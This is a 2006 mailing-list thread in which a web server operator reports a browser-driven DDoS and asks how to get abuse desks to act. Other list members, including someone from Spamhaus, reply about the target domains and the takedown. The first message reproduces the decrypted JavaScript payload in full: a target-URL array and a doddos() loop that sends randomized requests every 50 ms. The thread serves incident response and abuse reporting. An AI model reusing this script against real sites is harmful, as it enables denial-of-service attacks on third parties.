Ongoing DDoS helped by non responsive abuse desks
Hi, One of our web servers got hammered by ~5K req/s for hours from browsers with the following referer: http://www.freewebs.com/ihatespammers/nospam.html Both freewebs.com and their network provider Cogent has been contacted without any visible result, even if the script is very effective (no filtering slows it down but redirecting to an https with an invalid cert eventually messes the attackers' browser). Given that the source is still up (and has been updated since yesterday), I wonder what one can expect by contacting each concerned domain host. The decrypted jscript is: var target=new Array(); target[0]="http://weerona.com/ph/order.php?%rand%" target[1]="http://fabutons.info/aw/001/?%rand%" target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%" target[3]="http://www.fakeidonline.com/store.php?%rand%" target[4]="http://ccebak.bestti.info/p/?%rand%" target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%" target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=%rand%" target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost" //target[5]="http://zzizuyxxqquzjphyn.logomarz.com/counter.php?%rand%" //target[6]="http://svbcrwevktdbxf.logomarz.com/counter.php?%rand%" //target[7]="http://fqnbywsqfghz.logomarz.com/counter.php?%rand%" //target[8]="http://fvguwwnemlpgkd.logomarz.com/counter.php?%rand%" //target[9]="http://www.logodentity.com/ordernow.php?%rand%" //target[10]="http://www.clearlogo.com/ordernow.php?plan=1&%rand%=%rand%" //target[11]="http://www.heartysouvenirs.info/?page=shoppingcart&%rand%=%rand%" //target[9]="http://www.webpromotionnow.com/?%rand%" // Do not edit below this line var arrcount = 0; var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; function doddos(){ var randomstring = ''; for (var i=0; i<8; i++) { var rnum = Math.floor(Math.random() * chars.length); randomstring += chars.substring(rnum,rnum+1); } if (arrcount > (target.length - 1)){ arrcount = 0; } var dimg = new Image; dimg.src=target[arrcount].replace(/\%rand\%/g,randomstring); arrcount++; setTimeout("doddos()",50); } setTimeout("doddos()",50);
On Mar 23, 2006, at 7:54 AM, Martin Lathoud wrote:
Hi,
One of our web servers got hammered by ~5K req/s for hours from browsers with the following referer:
[snip]
target[0]="http://weerona.com/ph/order.php?%rand%" target[1]="http://fabutons.info/aw/001/?%rand%" target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%" target[3]="http://www.fakeidonline.com/store.php?%rand%" target[4]="http://ccebak.bestti.info/p/?%rand%" target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%" target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=% rand%" target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost"
Which of these is your website? Cheers, Steve
2006/3/23, Steve Atkins <steve@blighty.com>:
[snip]
target[0]="http://weerona.com/ph/order.php?%rand%" target[1]="http://fabutons.info/aw/001/?%rand%" target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%" target[3]="http://www.fakeidonline.com/store.php?%rand%" target[4]="http://ccebak.bestti.info/p/?%rand%" target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%" target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=% rand%" target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost"
Which of these is your website? none, they change A records of these rogue domains as they see fit to spread the attack among more victims.
On 23 Mar 2006, at 16:54, Martin Lathoud wrote:
One of our web servers got hammered by ~5K req/s for hours from browsers with the following referer: http://www.freewebs.com/ihatespammers/nospam.html Both freewebs.com and their network provider Cogent has been contacted without any visible result
I found freewebs very responsive, I emailed them and they shut the site down instantly. It's likely the originators of the DDOS are the Yambo gang out of Ukraine. Other hosts involved in this attack are located on Chinese IPs we know to be under the control of Yambo... http://www.spamhaus.org/rokso/listing.lasso?-op=cn&spammer=Yambo% 20Financials Steve Linford The Spamhaus Project http://www.spamhaus.org
participants (3)
-
Martin Lathoud
-
Steve Atkins
-
Steve Linford